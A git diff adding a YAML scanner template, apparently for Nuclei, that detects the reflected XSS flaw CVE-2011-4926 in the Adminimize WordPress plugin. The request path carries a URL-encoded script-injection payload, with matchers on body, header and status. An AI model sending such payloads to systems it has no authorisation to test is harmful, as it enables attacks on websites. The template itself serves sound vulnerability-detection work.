diff --git a/cves/2011/CVE-2011-4926.yaml b/cves/2011/CVE-2011-4926.yaml new file mode 100644 index 0000000000..465eeaba59 --- /dev/null +++ b/cves/2011/CVE-2011-4926.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-4926 + +info: + name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200